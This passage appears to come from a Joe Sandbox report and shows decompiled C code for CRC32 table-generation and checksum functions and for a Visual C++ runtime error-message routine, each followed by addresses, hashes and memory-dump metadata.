0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((( !((( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001;
					_t72 = _t72 + 1;
				} while (_t72 < 0x100);
				while(_t72 < 0x800) {
					_t38 =  *(0x4232c0 + _t72 * 4);
					_t72 = _t72 + 1;
					 *(0x4236bc + _t72 * 4) = _t38 >> 0x00000008 ^  *(0x4236c0 + (_t38 & 0x000000ff) * 4);
				}
				 *0x42333c = 0x418fd0;
				_t37 = E00411420();
				if(_t37 == 0) {
					 *0x42333c = 0x418ef0;
					return _t37;
				}
				return _t37;
			}






                              0x004133d0
                              0x004133d2
                              0x00413460
                              0x00413467
                              0x00413468
                              0x0041347a
                              0x00413480
                              0x00413499
                              0x0041349a
                              0x004134a1
                              0x004134a9
                              0x004134b3
                              0x004134ba
                              0x004134bc
                              0x00000000
                              0x004134bc
                              0x004134c6

                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 951ce894d9222124d4953917d4d44c2f3af61f07f2abcd4f63f3fcd2ee4f65ae
                              • Instruction ID: b54c2cd6cfa36051406bb29028bc26d5c271240bfac9ba2f52dccebc7510b76a
                              • Opcode Fuzzy Hash: 951ce894d9222124d4953917d4d44c2f3af61f07f2abcd4f63f3fcd2ee4f65ae
                              • Instruction Fuzzy Hash: 52214F3E370D0607A71C8B69AD336B921D2E38430A7C8A03DE68BC53D1EE6CD595860D
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00418EF1 Relevance: .1, Instructions: 70COMMONCrypto
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E00418EF1(signed char __ecx, signed int __edx, intOrPtr _a8, intOrPtr _a12) {
				signed char _t42;
				signed int _t44;
				signed int _t50;
				signed int _t51;
				unsigned int _t59;
				signed char _t60;
				signed int _t62;
				void* _t63;
				intOrPtr _t65;
				intOrPtr _t67;
				signed int _t69;
				signed int _t73;
				signed int _t83;
				intOrPtr _t86;

				_t62 = __edx;
				_t42 = __ecx;
				_t65 = _a8;
				_t86 = _a12;
				if(_t65 != 0) {
					while((_t62 & 0x00000007) != 0) {
						_t83 =  *_t62 & 0x000000ff;
						_t62 = _t62 + 1;
						_t42 = _t42 >> 0x00000008 ^  *(_t86 + (_t83 ^ _t42 & 0x000000ff) * 4);
						_t65 = _t65 - 1;
						if(_t65 != 0) {
							continue;
						}
						break;
					}
					if(_t65 >= 0x10) {
						_t67 = _t65 + _t62;
						_a8 = _t67;
						_t69 = _t67 - 0x00000008 & 0xfffffff8;
						_t63 = _t62 - _t69;
						_t44 = _t42 ^  *(_t63 + _t69);
						_t59 =  *(_t63 + _t69 + 4);
						do {
							_t50 = _t59 & 0x000000ff;
							_t51 = _t59 & 0x000000ff;
							_t60 = _t59 >> 0x10;
							_t59 =  *(_t63 + _t69 + 0xc);
							_t44 =  *(_t86 + 0x1000 + (_t44 >> 0x00000010 & 0x000000ff) * 4) ^  *(_t63 + _t69 + 8) ^  *(_t86 + 0xc00 + _t50 * 4) ^  *(_t86 + 0x800 + _t51 * 4) ^  *(_t86 + 0x400 + (_t60 & 0x000000ff) * 4) ^  *(_t86 + (_t60 & 0x000000ff) * 4) ^  *(_t86 + 0x1c00 + (_t44 & 0x000000ff) * 4) ^  *(_t86 + 0x1800 + (_t44 & 0x000000ff) * 4) ^  *(_t86 + 0x1400 + (_t44 >> 0x00000010 & 0x000000ff) * 4);
							_t63 = _t63 + 8;
						} while (_t63 != 0);
						_t42 = _t44 ^  *(_t63 + _t69);
						_t62 = _t69;
						_t65 = _a8 - _t62;
						L7:
						while(_t65 != 0) {
							_t73 =  *_t62 & 0x000000ff;
							_t62 = _t62 + 1;
							_t42 = _t42 >> 0x00000008 ^  *(_t86 + (_t73 ^ _t42 & 0x000000ff) * 4);
							_t65 = _t65 - 1;
						}
						return _t42;
					}
				}
				goto L7;
			}

















                              0x00418ef1
                              0x00418ef4
                              0x00418ef6
                              0x00418efa
                              0x00418f00
                              0x00418f06
                              0x00418f0e
                              0x00418f11
                              0x00418f1a
                              0x00418f1e
                              0x00418f1f
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00418f1f
                              0x00418f24
                              0x00418f2a
                              0x00418f2c
                              0x00418f33
                              0x00418f36
                              0x00418f38
                              0x00418f3b
                              0x00418f40
                              0x00418f44
                              0x00418f4e
                              0x00418f58
                              0x00418f6f
                              0x00418f9b
                              0x00418f9d
                              0x00418f9d
                              0x00418fa2
                              0x00418fa5
                              0x00418fab
                              0x00000000
                              0x00418fad
                              0x00418fb1
                              0x00418fb4
                              0x00418fbd
                              0x00418fc1
                              0x00418fc1
                              0x00418fc8
                              0x00418fc8
                              0x00418f24
                              0x00000000

                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: a91e830b051fd3563903b3b4c558af91fd9d6843125d3e1887e1db665648e344
                              • Instruction ID: d8f843b74cbd450328ce6fa4395b1e87caa1541ea2f4e00bece6a97874f35350
                              • Opcode Fuzzy Hash: a91e830b051fd3563903b3b4c558af91fd9d6843125d3e1887e1db665648e344
                              • Instruction Fuzzy Hash: 9F21D7329046254BCB42DE6EE4845A7F392FBC437AF23472BED8467290C638E855D6A0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00418FCB Relevance: .1, Instructions: 70COMMONCrypto
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E00418FCB(signed char __ecx, signed int __edx, intOrPtr _a4, intOrPtr _a8) {
				signed char _t39;
				signed int _t41;
				signed int _t63;
				void* _t64;
				intOrPtr _t65;
				intOrPtr _t66;
				signed int _t68;
				signed int _t70;
				signed int _t74;
				intOrPtr _t76;

				_t63 = __edx;
				_t39 = __ecx;
				_t65 = _a4;
				_t76 = _a8;
				if(_t65 != 0) {
					while((_t63 & 0x00000007) != 0) {
						_t74 =  *_t63 & 0x000000ff;
						_t63 = _t63 + 1;
						_t39 = _t39 >> 0x00000008 ^  *(_t76 + (_t74 ^ _t39 & 0x000000ff) * 4);
						_t65 = _t65 - 1;
						if(_t65 != 0) {
							continue;
						}
						break;
					}
					if(_t65 >= 0x10) {
						_t66 = _t65 + _t63;
						_a4 = _t66;
						_t68 = _t66 - 0x00000008 & 0xfffffff8;
						_t64 = _t63 - _t68;
						_t41 = _t39 ^  *(_t64 + _t68);
						do {
							_t41 =  *(_t76 + 0xc00 + (( *(_t76 + 0xc00 + (_t41 & 0x000000ff) * 4) ^  *(_t64 + _t68 + 4) ^  *(_t76 + 0x800 + (_t41 & 0x000000ff) * 4) ^  *(_t76 + (_t41 >> 0x00000010 & 0x000000ff) * 4) ^  *(_t76 + 0x400 + (_t41 >> 0x00000010 & 0x000000ff) * 4)) & 0x000000ff) * 4) ^  *(_t64 + _t68 + 8) ^  *(_t76 + 0x800 + (( *(_t76 + 0xc00 + (_t41 & 0x000000ff) * 4) ^  *(_t64 + _t68 + 4) ^  *(_t76 + 0x800 + (_t41 & 0x000000ff) * 4) ^  *(_t76 + (_t41 >> 0x00000010 & 0x000000ff) * 4) ^  *(_t76 + 0x400 + (_t41 >> 0x00000010 & 0x000000ff) * 4)) & 0x000000ff) * 4) ^  *(_t76 + (( *(_t76 + 0xc00 + (_t41 & 0x000000ff) * 4) ^  *(_t64 + _t68 + 4) ^  *(_t76 + 0x800 + (_t41 & 0x000000ff) * 4) ^  *(_t76 + (_t41 >> 0x00000010 & 0x000000ff) * 4) ^  *(_t76 + 0x400 + (_t41 >> 0x00000010 & 0x000000ff) * 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(_t76 + 0x400 + (( *(_t76 + 0xc00 + (_t41 & 0x000000ff) * 4) ^  *(_t64 + _t68 + 4) ^  *(_t76 + 0x800 + (_t41 & 0x000000ff) * 4) ^  *(_t76 + (_t41 >> 0x00000010 & 0x000000ff) * 4) ^  *(_t76 + 0x400 + (_t41 >> 0x00000010 & 0x000000ff) * 4)) >> 0x00000010 & 0x000000ff) * 4);
							_t64 = _t64 + 8;
						} while (_t64 != 0);
						_t39 = _t41 ^  *(_t64 + _t68);
						_t63 = _t68;
						_t65 = _a4 - _t63;
						L8:
						while(_t65 != 0) {
							_t70 =  *_t63 & 0x000000ff;
							_t63 = _t63 + 1;
							_t39 = _t39 >> 0x00000008 ^  *(_t76 + (_t70 ^ _t39 & 0x000000ff) * 4);
							_t65 = _t65 - 1;
						}
						return _t39;
					}
				}
				goto L8;
			}













                              0x00418fcb
                              0x00418fd4
                              0x00418fd6
                              0x00418fda
                              0x00418fe0
                              0x00418fe6
                              0x00418fee
                              0x00418ff1
                              0x00418ffa
                              0x00418ffe
                              0x00418fff
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00418fff
                              0x00419004
                              0x0041900a
                              0x0041900c
                              0x00419013
                              0x00419016
                              0x00419018
                              0x00419020
                              0x00419076
                              0x0041907d
                              0x0041907d
                              0x00419082
                              0x00419085
                              0x0041908b
                              0x00000000
                              0x0041908d
                              0x00419091
                              0x00419094
                              0x0041909d
                              0x004190a1
                              0x004190a1
                              0x004190a8
                              0x004190a8
                              0x00419004
                              0x00000000

                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d88b4545622fc2f48369f3988b55fed1d0241348448e0d26e09a3dd7181b3030
                              • Instruction ID: adcd1020660a0caec7aa531f2501062eb824b7187074cdff0887c6cd02d8138b
                              • Opcode Fuzzy Hash: d88b4545622fc2f48369f3988b55fed1d0241348448e0d26e09a3dd7181b3030
                              • Instruction Fuzzy Hash: EF21377291442587C701DF1DE4986B7B7E1FFC8319F678B2BD9818B180CA39DC81D690
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00417836 Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 100fileCOMMONLIBRARYCODE
                              Download Yara Rule
                              C-Code - Quality: 96%
                              			E00417836(void* __edi, long _a4) {
				char _v164;
				char _v424;
				int _t17;
				long _t19;
				signed int _t42;
				long _t47;
				void* _t48;
				signed int _t54;
				void** _t56;
				void* _t57;

				_t48 = __edi;
				_t47 = _a4;
				_t42 = 0;
				_t17 = 0x422a58;
				while(_t47 !=  *_t17) {
					_t17 = _t17 + 8;
					_t42 = _t42 + 1;
					if(_t17 < 0x422ae8) {
						continue;
					}
					break;
				}
				_t54 = _t42 << 3;
				_t2 = _t54 + 0x422a58; // 0x2c000000
				if(_t47 ==  *_t2) {
					_t17 =  *0x423348; // 0x0
					if(_t17 == 1 || _t17 == 0 &&  *0x420734 == 1) {
						_t16 = _t54 + 0x422a5c; // 0x41bd2c
						_t56 = _t16;
						_t19 = E004144D0( *_t56);
						_t17 = WriteFile(GetStdHandle(0xfffffff4),  *_t56, _t19,  &_a4, 0);
					} else {
						if(_t47 != 0xfc) {
							if(GetModuleFileNameA(0,  &_v424, 0x104) == 0) {
								E00418230( &_v424, "<program name unknown>");
							}
							_push(_t48);
							_t49 =  &_v424;
							if(E004144D0( &_v424) + 1 > 0x3c) {
								_t49 = E004144D0( &_v424) +  &_v424 - 0x3b;
								E004183B0(E004144D0( &_v424) +  &_v424 - 0x3b, "...", 3);
								_t57 = _t57 + 0x10;
							}
							E00418230( &_v164, "Runtime Error!\n\nProgram: ");
							E00418240( &_v164, _t49);
							E00418240( &_v164, "\n\n");
							_t12 = _t54 + 0x422a5c; // 0x41bd2c
							E00418240( &_v164,  *_t12);
							_t17 = E00418320( &_v164, "Microsoft Visual C++ Runtime Library", 0x12010);
						}
					}
				}
				return _t17;
			}













                              0x00417836
                              0x0041783f
                              0x00417842
                              0x00417844
                              0x00417849
                              0x0041784d
                              0x00417850
                              0x00417856
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00417856
                              0x0041785b
                              0x0041785e
                              0x00417864
                              0x0041786a
                              0x00417872
                              0x00417963
                              0x00417963
                              0x0041796e
                              0x00417980
                              0x00417889
                              0x0041788f
                              0x004178ab
                              0x004178b9
                              0x004178bf
                              0x004178c6
                              0x004178c8
                              0x004178d8
                              0x004178f3
                              0x004178fb
                              0x00417900
                              0x00417900
                              0x0041790f
                              0x0041791c
                              0x0041792d
                              0x00417932
                              0x0041793f
                              0x00417955
                              0x0041795d
                              0x0041788f
                              0x00417872
                              0x00417988

                              APIs
                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?), ref: 004178A3
                              • GetStdHandle.KERNEL32(000000F4,0041BD2C,00000000,00000000,00000000,?), ref: 00417979
                              • WriteFile.KERNEL32(00000000), ref: 00417980
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
